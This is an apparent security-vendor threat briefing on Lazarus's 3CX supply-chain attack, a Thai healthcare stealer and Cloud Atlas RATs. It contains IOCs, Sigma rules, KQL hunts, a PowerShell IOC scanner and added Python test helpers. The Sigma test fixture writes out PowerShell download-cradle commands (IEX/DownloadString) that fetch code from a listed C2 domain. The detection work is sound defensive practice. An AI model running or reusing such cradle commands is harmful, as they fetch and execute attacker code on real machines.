Lazarus Supply Chain & Cloud Atlas RATs: OTX Pulse Analysis — Global Threat Briefing

Security Arsenal Team
June 22, 2026

This briefing synthesizes three critical pulses from the AlienVault OTX platform, highlighting a convergence of APT activity and crimeware targeting critical infrastructure and government sectors globally. Threat actors are increasingly leveraging trusted software supply chains and archive-based payloads to bypass defenses.

Threat Summary

Recent OTX pulses reveal a multi-faceted threat landscape:

  1. Supply Chain Compromise (Lazarus Group): The Lazarus Group has resumed operations targeting the Finance and Energy sectors via a sophisticated supply chain attack on the 3CXDesktopApp softphone. Trojanized installers deploy malicious ffmpeg.dll binaries (TxRLoader/ArcfeedLoader) to establish C2 beacons.
  2. Geographic Targeting (Thailand Healthcare): An unidentified threat actor is actively spear-phishing Thailand’s Ministry of Health and healthcare entities. The campaign utilizes malicious .rar archives containing obfuscated batch scripts and a Python-based stealer (sim.py), leveraging GitHub for payload hosting.
  3. Espionage Operations (Cloud Atlas): The Inception Framework (Cloud Atlas) has expanded its toolset, targeting government and commercial entities in Russia and Belarus. New tools like PowerCloud and VBCloud are being delivered via phishing ZIPs containing malicious LNK shortcuts to facilitate data exfiltration and network reconnaissance.

Collectively, these campaigns demonstrate a shift towards complex initial access vectors—supply chain compromise and trusted archive formats—coupled with diverse malware families designed for persistence and data theft.

Threat Actor / Malware Profile

Lazarus Group (3CXDesktopApp Campaign)

  • Malware: TxRLoader, ArcfeedLoader
  • Distribution: Trojanized signed installers of legitimate 3CXDesktopApp software.
  • Behavior: The attack chain executes a compromised ffmpeg.dll side-loaded by the legitimate application. This DLL initiates HTTPS beacons to attacker-controlled infrastructure (e.g., akamaicontainer.com) to fetch second-stage payloads.
  • Anti-Analysis: Uses signed binaries to bypass application whitelisting and SSL/TLS for C2 communication to blend in with corporate traffic.

Cloud Atlas (Inception Framework)

  • Malware: PowerCloud, VBCloud, PowerShower, ValleyRAT, NetSupport RAT, PhantomHeart
  • Distribution: Phishing emails with ZIP archives containing malicious LNK shortcuts.
  • Behavior: Employs PowerShower for recon and VBCloud for file theft. New tools like PowerCloud indicate a shift towards cloud-based exfiltration techniques.
  • Persistence: LNK files provide initial execution, likely leading to scheduled tasks or registry modifications for persistence.

Unknown Actor (Thailand Healthcare)

  • Malware: sim.py (Python Stealer)
  • Distribution: Spear-phishing emails with RAR archives.
  • Behavior: Utilizes heavily obfuscated batch scripts to launch a Python-based stealer. Payloads are retrieved from GitHub to avoid hosting infrastructure takedowns.
  • Targeting: Highly focused on Ministry of Health personnel and affiliated healthcare organizations.

IOC Analysis

Indicator Types:

  • Domains: Multiple C2 domains were identified, including infrastructure masquerading as cloud services (azureonlinecloud.com, onedrivesupport.net). SOC teams should block these at the perimeter and DNS layer.
  • File Hashes: A significant number of SHA256, MD5, and SHA1 hashes were provided for the malicious DLLs, Python scripts, and loaders. These should be imported into EDR detection rules.
  • CVEs: Cloud Atlas activity references CVE-2018-0802 and two 2025 vulnerabilities (CVE-2025-55182, CVE-2025-68670), suggesting potential exploit use or lateral movement vectors.

Operationalization:

  • Blocklist: Immediately add all listed domains and file hashes to blocklists.
  • Hunting: Use YARA rules to scan for the ffmpeg.dll side-loading pattern and Python scripts in user directories.
  • Decoding: The Python stealer (sim.py) likely relies on common libraries (requests, os); memory dumps of running Python processes may reveal C2 endpoints.

Detection Engineering

Sigma rules (YAML):
---
title: Suspicious DLL Side-Loading via 3CXDesktopApp
id: 6f3a2b1c-4d5e-6f78-9a0b-1c2d3e4f5a6b
description: Detects potential trojanized 3CXDesktopApp activity characterized by the loading of a malicious ffmpeg.dll or unusual child processes spawning from the signed application.
status: stable
author: Security Arsenal
date: 2026/06/23
references:
    - https://otx.alienvault.com/pulse/643f3a2b1c4d5e6f
tags:
    - attack.persistence
    - attack.defense_evasion
    - attack.t1574.002
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\3CXDesktopApp.exe'
        ImageLoaded|endswith: '\ffmpeg.dll'
    condition: selection
falsepositives:
    - Legitimate use of 3CXDesktopApp (verify signature and file hash)
level: high
---
title: Malicious Script Execution from RAR Archive
id: 7e8f9a0b-1c2d-3e4f-5a6b-7c8d9e0f1a2b
description: Detects execution of Python or Batch scripts spawned from archive extraction processes (WinRAR/7-Zip), a pattern observed in the Thailand Healthcare campaign.
status: stable
author: Security Arsenal
date: 2026/06/23
references:
    - https://otx.alienvault.com/pulse/7e8f9a0b1c2d3e4f
tags:
    - attack.execution
    - attack.initial_access
    - attack.t1566.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\WinRAR.exe'
            - '\7zFM.exe'
    selection_child:
        Image|endswith:
            - '\python.exe'
            - '\pythonw.exe'
            - '\cmd.exe'
            - '\powershell.exe'
        CommandLine|contains:
            - '.py'
            - '.bat'
    condition: all of selection_*
falsepositives:
    - Administrative tasks involving script extraction and execution
level: medium
---
title: Cloud Atlas PowerShell Beacon
id: 8b0c1d2e-3f4a-5b6c-7d8e-9f0a1b2c3d4e
description: Detects PowerShell commands used by Cloud Atlas for reconnaissance and payload delivery, specifically targeting C2 infrastructure masquerading as cloud services.
status: stable
author: Security Arsenal
date: 2026/06/23
references:
    - https://otx.alienvault.com/pulse/8b0c1d2e3f4a5b6c
tags:
    - attack.execution
    - attack.command_and_control
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\powershell.exe'
    selection_cmd:
        CommandLine|contains:
            - 'DownloadString'
            - 'IEX'
    selection_c2:
        CommandLine|contains:
            - 'onedrivesupport.net'
            - 'allgoodsdirect.com.au'
            - 'istochnik.org'
    # The download-cradle test and the C2-domain test must live in separate
    # selections: two 'CommandLine|contains' keys in one map are a duplicate
    # YAML key, and a loader that keeps the last one silently drops the first.
    condition: all of selection_*
falsepositives:
    - Unknown
level: critical
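The Cloud Atlas PowerShell Beacon rule only works as intended when its download-cradle test and its C2-domain test sit in separate selections joined by all of selection_*. The Python harness below is an added example, not part of the briefing or of Sigma's own tooling: it implements the endswith and contains modifiers over constructed process_creation events and shows what the rule degrades to if both tests share one selection map (the event strings and the example.invalid host are made up).

```python
def match_field(value, modifier, patterns):
    """One Sigma field test ('endswith' or 'contains'), case-insensitive;
    a list of patterns is OR-ed together, as Sigma specifies."""
    if value is None:
        return False
    value = value.lower()
    if isinstance(patterns, str):
        patterns = [patterns]
    for pat in patterns:
        pat = pat.lower()
        if modifier == "endswith" and value.endswith(pat):
            return True
        if modifier == "contains" and pat in value:
            return True
    return False


def selection_matches(selection, event):
    """Fields inside one selection map are AND-ed."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if not match_field(event.get(field), modifier, patterns):
            return False
    return True


def rule_fires(event, selections):
    """condition: all of selection_*"""
    return all(selection_matches(sel, event)
               for name, sel in selections.items() if name.startswith("selection_"))


# Detection block of the Cloud Atlas rule with each test in its own selection.
CORRECT = {
    "selection_img": {"Image|endswith": "\\powershell.exe"},
    "selection_cmd": {"CommandLine|contains": ["DownloadString", "IEX"]},
    "selection_c2": {"CommandLine|contains": ["onedrivesupport.net",
                                               "allgoodsdirect.com.au",
                                               "istochnik.org"]},
}
# What one selection with a duplicated 'CommandLine|contains' key degrades to
# when the YAML loader keeps only the last duplicate (PyYAML does).
DEGRADED = {k: v for k, v in CORRECT.items() if k != "selection_cmd"}

# Constructed process_creation events, not real telemetry.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
BEACON = {"Image": PS, "CommandLine": "powershell -nop IEX (New-Object Net.WebClient)"
          ".DownloadString('https://onedrivesupport.net/u')"}
LOOKUP = {"Image": PS, "CommandLine": "powershell Resolve-DnsName onedrivesupport.net"}
CRADLE = {"Image": PS, "CommandLine": "powershell IEX (iwr https://example.invalid/x).Content"}
```

Under CORRECT only BEACON fires; under DEGRADED the plain DNS lookup of the domain also fires, which is the false-positive profile the duplicate key would silently introduce.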


KQL hunting queries (run each block as a separate query; Kusto does not accept several tabular queries separated by ';'):

// Hunt for 3CX-related network activity to suspicious domains.
// has_any matches the domain inside a full URL; in~ only matched an exact RemoteUrl value.
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl has_any ("akamaicontainer.com", "azureonlinecloud.com", "officeaddons.com")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| order by Timestamp desc

// Hunt for Cloud Atlas domains
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl has_any ("onedrivesupport.net", "allgoodsdirect.com.au", "istochnik.org")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| order by Timestamp desc

// Hunt for file hashes associated with the Thailand campaign and Lazarus
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA256 in~ (
    "5407cda7d3a75e7b1e030b1f33337a56f293578ffa8b3ae19c671051ed314290",
    "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983",
    "92005051ae314d61074ed94a52e76b1c3e21e7f0e8c1d1fdd497a006ce45fa61",
    "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868",
    "b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb",
    "442e0f4e822842922e7e4685840194e99fd68c7f0ec38c1925914b8f724d5865",
    "4eebc38297a307d18784d6f9ebc8aa6e6f69860be970cc70d9e544deb1ff6ce0",
    "523388567630e4fbdc359f75232bf2ad82671a680d4bfdce0237fc30dfec4c80",
    "74bb6ad7e1310f30a3e24fd3cbbffa2c0c41c64e89e5d0dd1d6900e96b914183",
    "7709d8c34d490509f3624104611eb75a862944dd9d7a642f44514ada16c85ee9",
    "e5f6d9d405819e6b05b5d8268a2e973294859ad65237ede36ab612b536d0ac2b"
)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256
| order by Timestamp desc


PowerShell IOC hunt script:

# Security Arsenal IOC Hunt Script
# Scans for specific SHA256 hashes associated with the Lazarus and Thailand campaigns

$TargetHashes = @(
    "5407cda7d3a75e7b1e030b1f33337a56f293578ffa8b3ae19c671051ed314290",
    "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983",
    "92005051ae314d61074ed94a52e76b1c3e21e7f0e8c1d1fdd497a006ce45fa61",
    "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868",
    "b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb",
    "442e0f4e822842922e7e4685840194e99fd68c7f0ec38c1925914b8f724d5865",
    "4eebc38297a307d18784d6f9ebc8aa6e6f69860be970cc70d9e544deb1ff6ce0",
    "523388567630e4fbdc359f75232bf2ad82671a680d4bfdce0237fc30dfec4c80",
    "74bb6ad7e1310f30a3e24fd3cbbffa2c0c41c64e89e5d0dd1d6900e96b914183",
    "7709d8c34d490509f3624104611eb75a862944dd9d7a642f44514ada16c85ee9",
    "e5f6d9d405819e6b05b5d8268a2e973294859ad65237ede36ab612b536d0ac2b"
)

Write-Host "Scanning system for OTX Pulse indicators..." -ForegroundColor Cyan

# Scan C:\ and common AppData paths. Hashing every file under C:\ is slow;
# narrow $PathsToScan (e.g. to user profiles and the 3CX install folder) on large fleets.
$PathsToScan = @("C:\", "$env:LOCALAPPDATA", "$env:APPDATA")

foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Write-Host "Scanning $Path..." -ForegroundColor Yellow
        # -File skips directories (Get-FileHash cannot hash them); -Force includes hidden files
        Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue | ForEach-Object {
            $FileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($FileHash -and ($TargetHashes -contains $FileHash)) {
                Write-Host "[!] MATCH FOUND: $($_.FullName)" -ForegroundColor Red
            }
        }
    }
}

# Check the hosts file for C2 domains from all three pulses
$HostsFile = "$env:SystemRoot\System32\drivers\etc\hosts"
$C2Domains = @("akamaicontainer.com", "azureonlinecloud.com", "officeaddons.com", "onedrivesupport.net", "allgoodsdirect.com.au", "istochnik.org")

Write-Host "Checking hosts file for malicious entries..." -ForegroundColor Yellow
if (Test-Path $HostsFile) {
    # Ignore comment lines so a commented-out entry does not raise a false alert,
    # and escape the domain so its dots are not treated as regex wildcards.
    $Content = Get-Content $HostsFile | Where-Object { $_ -notmatch '^\s*#' }
    foreach ($Domain in $C2Domains) {
        if ($Content -match [regex]::Escape($Domain)) {
            Write-Host "[!] POTENTIAL HOSTS FILE HIJACKING DETECTED FOR: $Domain" -ForegroundColor Red
        }
    }
}

Write-Host "Scan complete." -ForegroundColor Green

Response Priorities

Immediate

  • Network Blocking: Block all domains listed in the IOC Analysis at the firewall, proxy, and DNS levels.
  • IOC Hunt: Execute the provided PowerShell script and KQL queries across the enterprise to identify compromised endpoints.
  • 3CX Mitigation: If 3CXDesktopApp is in use, verify the integrity of ffmpeg.dll and update to the latest patched version immediately.

24 Hours

  • Identity Review: Given the presence of stealers (sim.py), audit logs for unusual authentication attempts, especially for accounts associated with the targeted healthcare and government sectors.
  • Supply Chain Audit: Review software build pipelines and signer certificates to ensure no other trojanized utilities are present.

1 Week

  • Architecture Hardening: Implement application control (AppLocker) to prevent unsigned code execution and side-loading attacks (DLL hijacking).
  • Email Filtering: Update secure email gateways to block RAR and ZIP archives containing LNK or batch files, or sandbox all attachments.
  • Vulnerability Management: Patch systems against the CVEs referenced in the Cloud Atlas campaign (CVE-2025-55182, CVE-2025-68670).
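For the email-filtering item, the following Python check is an added example, not the briefing's code or any gateway vendor's: it flags ZIP attachments carrying LNK, batch or Python members, recursing into nested ZIPs and treating unreadable or over-nested archives as suspicious rather than clean. RAR inspection would need an external library and is assumed to be handled elsewhere; the sample attachment is constructed in memory.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Member types the briefing's campaigns ship inside phishing archives.
BLOCKED_EXTENSIONS = {".lnk", ".bat", ".cmd", ".py"}
NESTED_ARCHIVES = {".zip"}   # assumption: RAR is handled by an external library, not here


def suspicious_members(data, prefix="", depth=0, max_depth=3):
    """Return the paths of archive members (nested paths joined with '!') whose
    extension is block-listed. Nested ZIPs are opened up to max_depth; an
    unreadable archive or one nested too deep is reported, not silently passed."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [prefix + "<unreadable archive>"]
    hits = []
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = prefix + info.filename
            # Normalise backslashes and compare the last extension case-insensitively,
            # so 'Invoice.pdf.LNK' is caught by its real extension.
            ext = PurePosixPath(info.filename.replace("\\", "/")).suffix.lower()
            if ext in BLOCKED_EXTENSIONS:
                hits.append(name)
            elif ext in NESTED_ARCHIVES:
                if depth >= max_depth:
                    hits.append(name + "!<nesting limit reached>")
                else:
                    hits.extend(suspicious_members(zf.read(info), name + "!", depth + 1, max_depth))
    return hits


def build_sample():
    """Constructed phishing-style attachment: a decoy PDF, an LNK hiding behind a
    double extension, and a nested ZIP carrying a batch script."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("setup/run.BAT", "@echo constructed sample\r\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("invoice.pdf", b"%PDF-1.4 decoy")
        z.writestr("Invoice_2026.pdf.lnk", b"L\x00\x00\x00")  # constructed LNK stub, not a real shortcut
        z.writestr("attachments.zip", inner.getvalue())
    return outer.getvalue()
```

A gateway would quarantine the message when the returned list is non-empty and log the member paths for the analyst.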
